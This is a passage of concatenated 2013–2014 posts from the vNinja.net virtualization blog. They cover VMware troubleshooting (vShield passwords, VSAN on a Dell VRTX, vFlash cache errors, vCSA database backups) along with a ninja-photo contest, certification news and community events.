Since there was a grand total of 5 submissions, and one of them was immediately disqualified for a distinct lack of Ninja-presence, I decided to just do a random draw. The submitted photos were numbered by the order they appeared in on my post as I took this screenshot. I then put the number range 1 to 4 into random.org and recorded the output. By random selection, the winning submission is Ninja with Entourage, submitted by Chad Singleton. Congratulations! Please contact me for shipping details, and I’ll get the Chromecast sponsored by Veeam shipped in your direction as soon as possible! --- # VMware vShield Manager Upgrade - Password Issues URL: https://vNinja.net/vmware-2/vmware-vshield-manager-upgrade-password-issues/ Date: 2014-04-29 Author: christian Tags: Appliance, Internationalization, Password, VMware, vShield, vShield Manager While upgrading a vShield Manager 5.1.1 install to 5.1.4 at a client, I ran into an issue with logging in after a completed upgrade. The username and password used to log in, and subsequently upload the upgrade file, were no longer working after the upgrade finished and the vShield Manager appliance had been rebooted. It turns out that this was due to using international characters in the password for the admin user, in this case the Norwegian specialities æ, ø or å. I was “lucky” enough to have taken a snapshot of the 5.1.1 vShield Manager appliance before performing the upgrade. After reverting to the pre-upgrade snapshot, logging in, changing the password to one not containing international characters, and then performing the upgrade procedure again, the appliance was upgraded to 5.1.4 and logging in worked without problems. Be careful when using international characters in passwords for any of the VMware appliances, as I suspect this might be an issue for other components as well, not only the vShield Manager. --- # Want to Win a Google Chromecast?
URL: https://vNinja.net/news/win-google-chromecast/
Date: 2014-04-02
Author: christian
Tags: Contest, Photo, fun, Ninja

I have a free Google Chromecast to give away to one lucky winner. As part of being voted into the top 50 VMware & virtualization blogs I was lucky enough to win one for myself, and as an added bonus I get to give away one to one of my readers too! To be able to find a worthy winner of it, I've decided to host a contest. Since I do enjoy a bit of photography, and the site name is vNinja, the contest rules are as follows: Send in a photo of yourself, your wife, kids, grandma, cat or dog, dressed as a ninja. That's right, dress up someone as a ninja, snap a photo and send it my way either via Twitter or as a comment on this post, and I'll pick the best one. Note that the ninja has to be visible. Any photo received with no visible ninjas in it will be disqualified, even though stealth is the way of the ninja. The winner gets the Chromecast. Entries sent in before April 30th will be judged, so get to it! If you need tips on how to dress up, have a look at this:

---

# 2014 Top vBlog Results

URL: https://vNinja.net/virtualization/2014-top-vblog-results/
Date: 2014-03-27
Author: christian
Tags: Awesome, contest, fun, Vote

Eric Siebert has yet again pulled through, and organized his annual top VMware & virtualization blogs vote, and the results are now in. Congratulations to everyone involved, be it bloggers, podcasters or otherwise engaged in making this possible. This year, Eric hosted a live Google Hangout session with John M. Troyer, David M. Davis and Rick Vanover where the top lists were revealed, be sure to check it out: As far as results go, I'm very happy that you guys voted vNinja in at #43, of a total of 320, up a whopping 30 places since last year. This is the first year that vNinja breaks into the top 50, something that is very much appreciated.
vNinja was also listed in the independent category, where it was placed at a very, very respectable 18th place! What is even more fun, though, is that vSoup was voted the 2nd best Virtualization Podcast, only beaten by those pesky vBrownbag guys. As an added bonus, I even won a Google Chromecast for voting, and what's even better is that I get to give away one to one of vNinja's readers as well! So, if you want a free Google Chromecast, shipped directly your way, you have to send in a photo of yourself, your wife, kids, grandma, cat or dog, dressed as a ninja. That's right, dress up someone as a ninja, snap a photo and send it my way either via Twitter or as a comment on this post, and I'll pick the best one. The winner gets the Chromecast. Entries sent in before April 30th will be judged, so get to it!

---

# VSAN - The Unspoken Future

URL: https://vNinja.net/virtualization/vsan-unspoken-future/
Date: 2014-03-17
Author: christian
Tags: Data Center, featured, Form Factor, Node, SDDC, Server, Virtualization, VSAN

This rather tongue-in-cheek title is a play on Maish's recent VSAN - The Unspoken Truth post, where he highlights what he thinks is one of the hidden “problems” with the current version of VSAN: its inherent non-blade compatibility and the current lack of “rack based VSAN ready nodes”. Of course, this is a reality; if you base your current infrastructure on blade servers, VSAN probably isn't a good match as it stands today. Chances are that if you are currently running a blade-based datacenter, you have traditional external storage on the back end of that, and that you for quite some time will be running a form factor that VSAN simply isn't designed for. I don't disagree with Maish in that conclusion, not a bit. But what about the next server refresh? One of the things that VSAN is a facilitator for, along with enhancements in the storage industry, is the ability to move to other form factors.
Currently Supermicro offers their rather nice looking FatTwin™ Server Solution. If we look at what the SYS-F617R2-R72+ box offers, in a total rack space of 4U (less than most blade chassis), it is clear that the form factor choices will not just be tower or blade; they will also include other new form factors that are currently not in the forefront of people's minds when designing their data center. Looking at the Supermicro box again, in a 4U rack footprint, it offers these maximums per node:

- 2 x Intel® Xeon® processor E5-2600
- Up to 1TB DDR3 ECC LRDIMM
- 6 x Hot-swap 2.5" SAS2/SATA HDD trays

So, in 4U, you can get 16 CPUs, 8TB RAM and 48 SAS2/SATA bays. Stick a couple of those in your rack, with a few 10GbE ports, and then try to do something similar with a blade infrastructure! Now, of course, VSAN isn't for everyone, nor is it designed to be. In a way VSAN offers a peek into the future of datacenter design, in the same way that it shows us that the Software Defined Data Center (SDDC) is not just about the software; it's about how we think, manage AND design our back-end infrastructure. It's not just storage vendors that need to take heed and look at what they are offering, the same also goes for “traditional” server/node vendors. That's right, a server is becoming a node, and which vendor's sticker is on the front might not matter that much in the future.

The future is already here – it's just not evenly distributed. — William Gibson

---

# It's All Fun and Games Until...
URL: https://vNinja.net/vmware-2/fun-games-until/
Date: 2014-03-10
Author: christian
Tags: Certification, Snark, VCP, VMware

Remember, it's all fun and games until someone loses a certification

---

# VMware Certified Professional Recertification

URL: https://vNinja.net/vmware-2/vmware-certified-professional-recertification/
Date: 2014-03-08
Author: christian
Tags: Certification, VCAP, VCP, VMware, vSphere

VMware has announced a Recertification Policy for its VMware Certified Professional program, effective as of March 10, 2014. In short, it means that you are no longer a VCP(x) for life, but need to recertify every 2 years, unless you take a VCAP exam during the same period. If you do not upgrade your certification, your VCP status is revoked. For all the details, have a look at Recertification Policy: VMware Certified Professional. It also means that anyone currently holding a VCP certification needs to recertify before March 10th 2015, regardless of when the initial VCP was obtained. Those obtaining a VCP after March 10th will have to recertify within two years of obtaining the initial VCP. I think this is a good move, and is on par with other technical certifications like the ones offered by HP, Cisco and CompTIA (A+). After all, we live in an ever evolving technical market where continuous change happens, and if you are not able to keep current, the certification holds no real merit. This change from VMware also means that as long as you recertify your VCP exam within the two year period, there will not be a course requirement to upgrade; schedule your exam and you are ready to go. Previously you would get a grace period, after a new major release of vSphere, where you could re-certify without having to attend a new class. With this change, you have two years, and that is it. In a way, this also means that VMware will have to commit to major releases, with upgraded VCP versions, more frequently than every 2 years.
Looking at the last few vSphere releases, this seems to indicate a change in release cycles for major versions:

- vSphere 4 was released May 21st 2009.
- vSphere 5 was released July 12th 2011.
- vSphere 5.5 was released September 22nd 2013.

Remember, vSphere 5.5 is covered by the VCP5 (ok, there is a VCP510 and a VCP550 version) certification, so if this policy had been in place in 2011 when vSphere 5 was released, there would not have been any upgraded VCP certification to take within the two year validity period.

Update: What if VMware had called an old VCP certification “retired” instead of “expired”, would that cause less outrage and emotion?

---

# Rock the Vote 2014

URL: https://vNinja.net/virtualization/rock-vote-2014/
Date: 2014-02-22
Author: christian
Tags: Annual, Community, fun, VMware, Voting

Once again, it's time to vote for the top VMware & virtualization blogs. As usual Eric Siebert has opened up the floodgates and set up a voting system, and once again managed to create a lot of work for himself. So, let's all make it worth his while and get as many votes in as possible! There are a lot of blogs listed, this time there are over 300 in total. Cast your vote, and get more information about the process: Voting now open for the 2014 top VMware & virtualization blogs #

Helpful hint: vNinja.net is listed in the general section, as well as under independent bloggers, and vSoup is listed under Podcasts. Now go do your part.

---

# Configuring VSAN on a Dell PowerEdge VRTX

URL: https://vNinja.net/virtualization/configuring-vsan-dell-poweredge-vrtx/
Date: 2014-02-19
Author: christian
Tags: Dell, ESXi, Hardware, storage, VMware, VRTX, VSAN

The Dell PowerEdge VRTX shared infrastructure platform is interesting, and I've been lucky enough to be able to borrow one from Dell for testing purposes.
One of the things I wanted to test was if it was possible to run VMware VSAN on it, even if the Shared PERC8 RAID controller it comes with is not on the VMware VSAN HCL, nor does it provide a method to do passthrough to present raw disks directly to the hosts. My test setup consists of:

- 1 Dell PowerEdge VRTX
  - SPERC8
  - 7 x 300GB 15k SAS drives
- 2 x Dell PowerEdge M520 blades
  - 2 x 6 core Intel Xeon E5-2420 @ 1.90GHz CPU
  - 32 GB RAM
  - 2 x 146GB 15k SAS drives

Both M520 blades were installed with ESXi 5.5, which is not a supported configuration from Dell. Dell has only certified ESXi 5.1 for use on the VRTX, but 5.5 seems to work just fine, with one caveat: **Drivers for the SPERC8 controller are not included in the Dell customized image for ESXi 5.5. To get access to the volumes presented by the controller, the 6.801.52.00 megaraid-sas driver needs to be installed after ESXi 5.5.** Once that is installed, the volumes will appear as storage devices on the host.

Sadly the SPERC8 controller does not support passthrough for disks in the PowerEdge VRTX chassis, something VSAN wants (for details check VSAN and Storage Controllers). For testing purposes though, there is a way around it. By creating several RAID0 Virtual Volumes on the controller, each one with only one disk in it, and assigning these disks to dedicated hosts in the chassis, it is possible to present the disks to ESXi in a manner that VSAN can work with: A total of six RAID0 volumes have been created, three for each host. Each host gets granted exclusive access to three disks, resulting in them being presented as storage devices in vCenter. Since I don't have any SSD drives in the chassis, something that is a requirement for VSAN, I also had to fool ESXi into believing one of the drives was in fact an SSD. This is done by changing the claim rule for the given device.
Find the device ID in the vSphere Client, and run the following commands to mark it as an SSD (check KB2013188 Enabling the SSD option on SSD based disks/LUNs that are not detected as SSD by default for details):

~ # esxcli storage nmp satp rule add --satp VMW_SATP_LOCAL --device naa.6b8ca3a0edc7a9001a961838899ee72a --option=enable_ssd
~ # esxcli storage core claiming reclaim -d naa.6b8ca3a0edc7a9001a961838899ee72a

Once that part is taken care of, the rest of the setup is done by following the VSAN setup guides found in the beta community. Two Dell PowerEdge M520 nodes up and running, with VSAN, replicating between them inside a Dell PowerEdge VRTX chassis. Pretty nifty!

It is worth noting that in this setup, the SPERC8 is a single point of failure, as it provides disk access to all of the nodes in the same cluster. This is not something you want to have in a production environment, but Dell does offer a second SPERC8 option for redundancy purposes in the PowerEdge VRTX. I did not do any performance testing on this setup, mostly since I don't have SSDs available for it, nor does it make much sense to do that kind of testing on a total of 6 HDD spindles; this is more a proof of concept setup than a production environment.

---

# Automatically Name Datastores in vSphere?

URL: https://vNinja.net/vmware-2/automatically-datastores-vsphere/
Date: 2014-02-18
Author: christian
Tags: Datastore, ESXi, Ideas, Policy Based Computing, storage, vCenter, Virtualization, VMware, VSAN, vSphere

William Lam posted “Why you should rename the default VSAN Datastore name” where he outlines why the default name for VSAN data stores should be changed. Of course, I completely agree with his views on this; leaving it at the default might cause confusion down the line. At the end of the post, William asks the following: I wonder if it would be useful to have a feature in VSAN to automatically append the vSphere Cluster name to the default VSAN Datastore name? What do you think?
The answer to that is quite simple too; yes. It would be great to be able to append the cluster name automatically. But this got me thinking: wouldn't it be even better to use the same kind of naming pattern scheme we get when provisioning Horizon View desktops, when we provision datastores? In fact, this should also be an option for other datastores, not just when using VSAN. Imagine the possibilities if you could define datastore naming schemes in your vCenter, and add a few variables like this, for instance: {datastoretype}-{datacentername}-{clustername/hostname}-{fixed:03}. Then you could get automatic, and perhaps even sensible, datastore naming like this:

- local-hqdc-esxi001-001
- iscsi-hqdc-cluster01-001
- nfs-hqdc-cluster01-001
- fc-hqdc-cluster01-001
- vsan-hqdc-cluster01-001

And so on… I'm sure there are other, potentially even more useful, variables that could be used here, perhaps even incorporating something about tiering and SLAs (platinum/gold/silver etc.) but that would require that you knew the storage characteristics and how they map to your naming scheme when it gets defined. But yes, we do need to be able to automatically name our datastores in a coherent manner, regardless of storage type. After all, we're moving to a model of policy based computing; shouldn't naming of objects like datastores also be ruled by policy, defined at a Datacenter level in vCenter (wait a minute, why don't we do the same for hosts joined to a datacenter or cluster?)

---

# Random VCDX Tips and Quotes?

URL: https://vNinja.net/virtualization/random-vcdx-tips-quotes/
Date: 2014-01-29
Author: christian
Tags: Desktop, featured, fun, GeekTool, PHP, Quotes, Script, VCDX

I needed something to spruce up my desktop environment, and it seems that one of the more popular ways to do that is to display random quotes and such on your desktop. Instead of hooking up to an existing quotes database, I simply made my own.
I have collected a few VCDX related tips and quotes, primarily from the archive Duncan Epping put together of VCDX Tips from VCDX 001 John Arrasjid, but also from the “submissions” I got from VCDX? Give Me a Quote! If anyone else wants their quote/tip/hint added to the database, please let me know! But gathering all of these in a single location has no real purpose on its own, so I coded up a really small PHP script that picks a random quote and returns it with attribution. The output is available at http://vninja.net/labs/quotes/quote.php and should return a random line from the db on each query. I use this in combination with GeekTool to display a random, changing quote right on my desktop. Inside GeekTool, I run the following command to generate the output:

curl http://vninja.net/labs/quotes/quote.php

This is set to refresh every 120 seconds, as long as I have internet connectivity. Feel free to use the script to do something similar, or if you have a better idea for its usage, let me know!

---

# VCDX? Give me a Quote!

URL: https://vNinja.net/news/vcdx-give-quote/
Date: 2014-01-24
Author: christian
Tags: fun, Quotes, VCDX

For a tiny project, I need some help from anyone who has completed (successfully or not) the VCDX process. _All I'm asking is that you provide me with a single line quote about the VCDX process, or the VCDX program itself._ Please send any quotes to me on Twitter, either as a mention or as a DM, your choice. Once I have a handful of quotes available, they will be made public for others to use as well… A bit vague, I know, but more details will come later.
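The quote-picking idea from the post above is easy to prototype without PHP as well. A minimal shell sketch, assuming a hypothetical quotes.txt with one quote per line (the example lines are placeholders, not entries from the real database behind quote.php):

```shell
# Build a stand-in quotes file; one quote per line, attribution included.
cat > quotes.txt <<'EOF'
Example quote one - Anonymous
Example quote two - Anonymous
Example quote three - Anonymous
EOF

# Pick and print one random line, like quote.php does on each request.
quote=$(shuf -n 1 quotes.txt)
echo "$quote"
```

Pointing GeekTool at a local script like this instead of curl would also keep the rotation working without internet connectivity.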
---

# Fixing "Could not create vFlash cache" error when powering on a VM

URL: https://vNinja.net/virtualization/fixing-could-create-vflash-cache-error-powering-vm/
Date: 2014-01-19
Author: christian
Tags: featured, SSD, vCenter, vCenter Appliance, VCSA, vFlash Read Cache, vFRC, vSphere, Web Client

During some way overdue housekeeping in my HP Microserver-based “Homelab” today, I ran into a rather annoying issue that prevented me from starting one of my more important VMs, namely my home Domain Controller. In short, I removed an old SSD drive that I've used for vFlash Read Cache (vFRC) testing and installed a new 1TB drive instead. Since I have a rather beefy work lab now, I need space more than speed at home, so this seemed like a good idea at the time. A good idea that is, until I tried starting my DC VM, which is also my DNS and DHCP server, and got greeted with this little gem: The “Could not create vFlash cache: msg.vflashcache.error.VFC_FAILURE” error is understandable, since the SSD drive was removed, but I honestly did not think that even if a VM was configured to use it, its absence would prevent a power-on operation on that VM. I would have expected it to throw a warning about the cache location missing, and warn me that acceleration was not happening, not a flat out “cannot power on”.

Normally the fix for this would be quick and easy: edit the VM and remove the vFRC configuration. But since my host has a whopping total of 8GB of memory, I don't have vCenter running at all times. Editing the VM settings through the vCenter Legacy Client (C#) does not work, since vFRC requires Virtual Hardware Version 10, which it cannot edit. Once I got the vCenter Server Appliance (vCSA) fired up, I realised that I had somehow forgotten the admin AND root passwords, and was completely unable to log on. How that has happened is beyond me, but for the life of me I was not able to log on.
Next step was to try and edit the VM from VMware Workstation 10 installed on one of the Windows boxes in my network. Sadly Workstation has no concept of vFRC, and it is not possible to edit that particular VM setting, even if you connect it to the vSphere host. I later also realized that VMware Workstation 10 is unable to connect host USB peripherals, like printers, to a VM, but that's beside the point right now. So, short of trying to hack the VM Hardware Version to a value that the vSphere Client can handle, or deploying a new vCSA instance, I was left with editing the VM's vmx file directly. Thankfully this was an easy way to fix the problem, and get the VM powered on.

For each vmdk file that is configured to use vFRC, there is a corresponding entry in the vmx file that controls vFRC. In order to turn off vFRC acceleration for a given disk, download the vmx file, and change the value for .vFlash.enabled from

sched.scsi0:2.vFlash.enabled = "TRUE"

to

sched.scsi0:2.vFlash.enabled = "FALSE"

Re-upload the vmx file, and try to power on. In my case, this fixed the problem of powering on the VM. This problem again highlights one of the problems with the dependency on the new vSphere Web Client. In a real production environment, the vCenter would be up and running at all times, and editing the VM would have been a small task, but what if you had used vFRC to speed up vCSA itself, and you had a failed SSD drive? Of course, in this case the fault is mostly mine. I removed a “production SSD” without first removing the vFRC configuration, I did not have a working vCSA with Web Client up and running when this was done, and I had forgotten my passwords. A pretty specific error generating procedure if there ever was one. It's an easy fix to edit the vmx file, but it does at times feel a little bit like you are now able to cut off the branch you are sitting on with the new vSphere Web Client.
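The vmx edit can also be done in one pass when several disks have vFRC configured. A sketch using sed on a sample file (the two sched.scsi entries are made up to mirror the example above; run this against a copy of the downloaded vmx, not the live file):

```shell
# Sample vmx fragment standing in for the real downloaded file.
vmx=$(mktemp)
cat > "$vmx" <<'EOF'
sched.scsi0:2.vFlash.enabled = "TRUE"
sched.scsi0:3.vFlash.enabled = "TRUE"
EOF

# Flip every vFRC entry from TRUE to FALSE, keeping a .bak copy of the original.
sed -i.bak 's/\(\.vFlash\.enabled = \)"TRUE"/\1"FALSE"/' "$vmx"

cat "$vmx"
```

The .bak copy gives you an easy way back if the power-on still fails for some other reason.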
In simpler days, you could pretty much fix anything by connecting the vSphere Client to the host and fix any errors there, but now the dependency on the vCenter Server is stronger than ever. Before upgrading your VMs to Hardware Version 10, make sure you understand the implications of going all-in with dependencies on the Web Client and vCenter. It might just come back and bite you if you haven't thought through your design.

---

# Importing SSL Certificates to Raspberry Pi Thin Client

URL: https://vNinja.net/virtualization/importing-ssl-certificates-raspberry-pi-thin-client/
Date: 2013-12-05
Author: christian
Tags: Certificates, Citrix, Raspberry Pi, Receiver, SSL, Thin Client

When playing around with the Raspberry Pi Thin Client, I ran into an issue with the SSL certificates for the Citrix Receiver client. For some reason it didn't want to play with the certificates installed on the server side, and popped the following error message: **You have not chosen to trust "AddTrust External CA Root", the issuer of the server's security certificate.** Thankfully there is a quick fix for this! Since Iceweasel is also in the RPTC distribution, and it has a lot more SSL root CA certificates included by default, all that was required (in my case) was to link the certificates it has with the certificates the Citrix Receiver client can use. Issue the following command to create symlinks for the “missing” certificates in the Citrix Receiver keystore:

sudo ln -s /usr/share/ca-certificates/mozilla/* /opt/Citrix/ICAClient/keystore/cacerts/

Supply the root password, which in RPTC is raspberry by default, and if your CA's root certificate is included with Iceweasel, you should now be able to connect without getting certificate errors.
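If you want to see what that command actually does before running it with sudo, the same approach can be rehearsed in a throwaway sandbox. The directories and certificate filenames below are made up stand-ins for the Mozilla bundle and the Citrix keystore:

```shell
# Stand-ins for /usr/share/ca-certificates/mozilla and
# /opt/Citrix/ICAClient/keystore/cacerts/.
src=$(mktemp -d)
dst=$(mktemp -d)
touch "$src/AddTrust_External_Root.crt" "$src/Example_CA.crt"

# Same idea as above: symlink every certificate file into the keystore directory.
ln -s "$src"/* "$dst"/

# Each keystore entry is now a symlink pointing back to the source bundle.
ls -l "$dst"
```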
It's pretty neat to be able to use a small Raspberry Pi as a Thin Client like this, but it's too bad that it does not support VMware Horizon View using PCoIP (yet?), only RDP, something I have yet to test since my demo environment runs PCoIP only at the moment. Thanks again to Simplivity for their Raspberry Pi vEXPERT gift!

---

# Nordic VMUG Conference - My Thoughts

URL: https://vNinja.net/vmware-2/nordic-vmug-conference-thoughts/
Date: 2013-12-04
Author: christian
Tags: event, Nordic VMUG, Social, VMUG, VMware

On Tuesday, December 3, 2013 VMware User Group Denmark arranged the Nordic VMUG Conference. The event itself can only be described as a mini-VMworld, with over 600 registered attendees, and a speaker list worthy of such a nickname. The opening keynote was held by Joe Baguley, the closing keynote was held by Chad Sakac. In between those two, you had the possibility to attend sessions held by Cormac Hogan, Mike Laverick, Frank Brix, Paudie O'Riordan, Frank Denneman, Mattias Sundling, David Davis and Duncan Epping. There was even a mini solutions exchange where vendors scanned your badges, tried to sell you products and concepts, or just updated your geeky t-shirt wardrobe. Got that VMworld feeling yet?

Both Joe's and Chad's keynotes were eye-openers. It is really refreshing when people of “executive stature” like those two actually skip the marketing slides and just talk. And man, both those guys talk good.

"Think more like a chicken farmer, and less like a cat owner." ― Joe Baguley

"A software defined thing that requires special hardware is not a software defined thing." ― Joe Baguley

In particular Chad's closing “The Nature and Impact of Disruption - On Industries, Vendors, and Customers” was really interesting, as it was completely non-technical. The concept that disruption is not inherently good or bad, and that all change stems from a single individual, is really intriguing.
I think more people should ask themselves this: **How can I, or how do I, disrupt myself?**

"Disruption is characterized by change and fear." ― Chad Sakac

Most of the people who are a part of the VMware community have actually done this already, consciously or not. Think about that for a second… As usual at events, I spent most of my time networking and talking to people, and I even got the chance to meet a few people I had yet to meet. Liselotte Foverskov and Jane Rimmer immediately spring to mind, but I also got to have a chat with Magnus Andersson, and Rasmus Haslund actually drove me and my wife to the beer tasting event held at Mikkeller after the conference. I have to say that I am very impressed by what the Danish VMUG leadership has been able to pull off here; it is no small task arranging an event of this magnitude, especially when you do it in your spare time. I am honoured to have been invited as a guest, and it serves as a real inspiration now that we are really trying to get the Norwegian VMUG active, with our first meeting in Bergen in March 2014. Hopefully things are in motion, and we will have meetings in Oslo and in Trondheim as well. There is absolutely no way we are aiming as high as VMUGDK, at least not initially, but one thing is certain: if you don't know where you are going, any road will get you there.

---

# Sometimes You Simply Get What You Pay For

URL: https://vNinja.net/virtualization/simply-pay/
Date: 2013-12-01
Author: christian
Tags: Charity, Movember, Podcasting for Cancer

Some time during the Podcasting for Cancer fundraiser period I somehow suggested that we should pair it with this year's Movember. Despite my wife and daughters' strenuous protests, I signed up and went all in. By all in, I mean, all in. For the first time since I went to my then employer's Christmas party dressed as a woman, I shaved my whole face. My trusty goatee, which had been pretty much constantly with me since 1997, was gone. I looked like I was 12 years old.
And to be honest, it went pretty much downhill from there. I would like to thank Matthew Northam, Arjan Timmerman, Duncan Epping, Eric Sloof, Marco Broeken and Julian Wood for their Movember donations in my name. Sorry guys, but this is what you actually paid for. It's not pretty, but it is what it is. Remember, you have been warned. I guess that if this IT and virtualization thing doesn't work out, I can always audition for a part in Sons of Anarchy…

---

# VMware VCAP-DCD Boot Camp

URL: https://vNinja.net/virtualization/vmware-vcap-dcd-boot-camp/
Date: 2013-11-27
Author: christian
Tags: Boot Camp, Certification, VCAP, VCAP-DCD, VMware

A while before VMworld Europe 2013 in Barcelona, I was lucky enough to be asked by John Arrasjid if I wanted to help out reviewing the new VCAP-DCD boot camp VMware Education has been working on. So far the VCAP Design Boot Camp has been tested in Spain, Singapore, and Malaysia, with over 300 participants. In addition to this, a two part vBrownbag series covering the boot camp content was recorded and released:

- VCAP Design Bootcamp with John Arrasjid, Mostafa Khalil and Linus Bourque
- VCAP Design Bootcamp Part 2 with John Arrasjid, Linus Bourque and Jon Hall

If you are considering doing the VCAP-DCD certification, or are even just curious about this advanced certification content and process, this is a must watch. If you get the chance to physically attend one of the boot camps, do it! I was able to join one of the first ones held, in Barcelona, and I must say it's a bit of an eye-opener when it comes to understanding how the VCAP-DCD exam is designed and scored.

---

# Can Microsoft really be Fair and Balanced?

URL: https://vNinja.net/virtualization/microsoft-fair-balanced/
Date: 2013-10-29
Author: christian
Tags: Free, Hyper-V, Microsoft, SCVMM, System Center, Training, VCP, VMware

Microsoft has launched Virtualization2, a program to educate VMware administrators on Hyper-V and the System Center suite of tools.
In short, these are free online training sessions on November 19th and 20th, which also come with a voucher for their new Microsoft virtualization certification exam (74-409). This comes in addition to their existing Microsoft Virtualization for VMware Professionals Jump Start training course. I think this is a good idea, and if you are able to close your eyes to the hyperbole, and disregard things like “Microsoft Wants to Help VMware Experts “Future-Proof” Their Career”, I applaud this initiative. However, if the training content is based on Microsoft's own (flawed) vSphere vs Hyper-V & System Center comparisons (see Calling Out the Phony War: vSphere & Hyper-V for a detailed analysis), the training offered has little to no value. Vendor training is, and always will be, as Ed Grigson mentioned on Twitter, inherently biased by nature.

@h0bbel ...assuming that vendor training always has a bias (including VMware) — Ed Grigson (@egrigson) October 29, 2013

In this case, the level of both hyperbole and bias is what defines the quality of the content presented. If Microsoft manages to focus on their own product, seen from the perspective of someone who has experience with VMware vSphere, without resorting to over-the-top bias towards Hyper-V, this will be a valuable resource for lots of people, myself included. If not, well, it will just be added to the list of flawed marketing tactics that really are of little help to anyone, Microsoft included.

---

# Brace Yourselves: Top vBlog 2014 edition is coming

URL: https://vNinja.net/virtualization/brace-yourselves-top-vblog-2014-edition-coming/
Date: 2013-10-28
Author: christian
Tags: 2014, Blog, Vote

Eric Siebert has just announced the preliminary details for next year's Top vBlog vote. This time around it is sponsored by Veeam, and there are even prizes to be won, not only the notorious fame and fortune that comes with being voted into the top percentile.
Thanks again to Eric for putting all of this together; there is a lot of work involved and the community really values the effort. Note to self: Remember to actually nominate yourself this year, it might actually make a difference.

---

# Check for OS X Updates Automatically

URL: https://vNinja.net/osx/check-os-updates-automatically/
Date: 2013-10-22
Author: christian
Tags: Apple, automation, Impatient, Mac, OS X

Yeah, I admit it. I want OS X Mavericks, and I want it now. Unfortunately, it's not available yet from Software Update. So instead of manually checking every 5 minutes or so, I decided to create a small bash script that does it for me. It's very, very simple, but I think it does the job. First off, pop into Terminal and get root access:

h0bbel::h0bair { ~ }-> sudo su -

Then create a small bash script, I named mine update.sh, that contains the following:

while true
do
  softwareupdate -l
  sleep 60
done

Change it to be executable by running chmod +x update.sh. Then run the script, to have softwareupdate run over and over again (60 seconds after each completion) until you break it with ctrl-c:

h0bair:~ root# ./update.sh
Software Update Tool
Copyright 2002-2010 Apple

No new software available.

At least I now get a warning once it's available. I can has Mavericks nao?

---

# VMworld Europe 2013 - Here I Come

URL: https://vNinja.net/virtualization/vmworld-europe-2013/
Date: 2013-10-09
Author: christian
Tags: Barcelona, Tech Conference, VMware, vmworld

For the first time since 2010 I will actually be physically attending VMworld Europe! I fly over from the very cold, rainy and generally very autumny Norway to sunny Barcelona on Sunday the 13th. Based on my past experience from VMworld in Copenhagen, I have decided to go easy on the session scheduling and not fill my calendar to the brim.
Sure, the sessions provide insane amounts of useful content, but for me the main reason to attend VMworld is to physically meet up and talk to a lot of the people I usually spend a lot of time communicating with. The social aspect, also called the hallway track, is to me the most valuable aspect of attending. After all, the sessions are recorded and available post-conference anyway. So, expect to find me in the hangspace and community lounge for the most part. Odds are you might find me at a party or two as well… If you see me, please stop and say hi! I will also be a part of the vBrownbag TechTalks when we do an APAC Virtualization Podcast / vSoup crossover live recording. I'm really looking forward to that, should be some good fun! Oh, and I'll be a part of the vExpert Daily slot on Wednesday the 16th. I might also be doing a vBrownbag TechTalk of my own as well, but the jury is still out on that one…

---

# Social Media, Karma and Being a Dick

URL: https://vNinja.net/rant/social-media-karma-dick/
Date: 2013-10-08
Author: christian
Tags: Acronis, EMC, featured, Microsoft, Rant, Social Media, vmworld

Rant alert #

[@Acronis](https://twitter.com/Acronis) sorry, not happening. — Christian Mohn (@h0bbel) October 8, 2013

In and of itself, this tweet is fair enough, even if borderline spam. My reaction to it, however, tells a different story. _I admit it, it's a bit harsh and straight to the point, but something has to have triggered such a response, right?_ Rewind back to VMworld US, and Acronis posted this:

[@sbeloussov](https://twitter.com/sbeloussov) [@veeam](https://twitter.com/veeam) [@VMworld](https://twitter.com/VMworld) fortunately we don't need to make our customers drunk to persuade them to buy our soft.. — acronis (@Acronis) August 27, 2013

Here is another example (added post initial publish, thanks to Hans for his comment): Want to be smart or stupid? Veeam party is vodka party. Acronis is Blue Cheese-Red Wine party.
Be smart and get to know backup at [#VMworld](https://twitter.com/search?q=%23VMworld&src=hash)! — acronis (@Acronis) September 30, 2013 This just rubs me the wrong way. Not only does it imply something about a competitor, but it implies a lot about their customers as well. Tongue in cheek? Sure, but at the same time outright rude and alienating. For all I know, Acronis might just provide the greatest backup solution seen in the known universe, but their style of communication alienates me as a potential customer. I chose to call out Acronis this time, but it could just as easily have been EMC #NotAppy, or even Microsoft's Custard "stunt" at VMworld US 2013, or just about any company that employs booth babes in any way, shape or form. These things are, at least to me, just plain stupid. They might have seemed like a good idea in that late-night marketing mind-map session, but they just don't hold up when daylight appears and they are exposed to the real world. We all know that people we meet, online or otherwise, check who we are and what we do. We live in a digital age where it's easy to find information. Employers check their candidates, and I sure hope potential employees check their potential employers. Two-way traffic, as it should be! Please remember this: it's not only individuals who should be careful, companies should too. Treat everyone with respect, and magically others might just treat you the same way. Perhaps that would generate just as much attention as these attempts to be funny, which for the most part simply fall flat anyway. My opinion of you is formed by your demeanor. Please act accordingly. In essence: Don't be a dick. We all know tech conferences are filled with those already.
Oh and yeah, about that Karma thing: "If you're really a mean person you're going to come back as a fly and eat poop." ― [Kurt Cobain](http://www.goodreads.com/author/show/33041.Kurt_Cobain) So there. Header photo (c) Alan Turkus "Your karma is leaking" --- # vPostgres Database Backup in vCSA 5.5 URL: https://vNinja.net/virtualization/vpostgres-database-backup-vcsa-5-5/ Date: 2013-10-01 Author: christian Tags: Appliance, Backup, VCSA, VMware, vPostgres, vSphere With the new vSphere 5.5 release, the VMware vCenter Appliance (vCSA) has grown up to be a viable alternative to the traditional Microsoft Windows based vCenter deployment scenario. The new vCSA version supports up to 100 hosts and 3000 virtual machines (with an external Oracle database the values change to 1000/10000), a big improvement from 5 hosts and 50 virtual machines in the previous version. Sadly, the only external database option available for vCSA 5.5 is Oracle, which means there is still no external Microsoft SQL Server support. For those clients who don't have an existing Oracle infrastructure, this might be a problem, especially with regards to backup of the vCSA database. The internal database in vCSA is a modified version of Postgres that VMware has called vPostgres. Thankfully this also includes the native Postgres command to create database dumps, pg_dump. In order to create a database dump of the vPostgres database, the following command needs to be run over an SSH connection to the vCSA:

~ # /opt/vmware/vpostgres/1.0/bin/pg_dump EMB_DB_INSTANCE -U EMB_DB_USER -Fp -c > VCDBBackupFile

EMB_DB_INSTANCE and EMB_DB_USER are to be replaced with values from the /etc/vmware-vpx/embedded_db.cfg file. In my case, the exact command would be:

~ # /opt/vmware/vpostgres/1.0/bin/pg_dump VCDB -U vc -Fp -c > /tmp/VCDBBackupFile

Note that EMB_DB_INSTANCE is replaced with VCDB and EMB_DB_USER is replaced by vc in the command above.
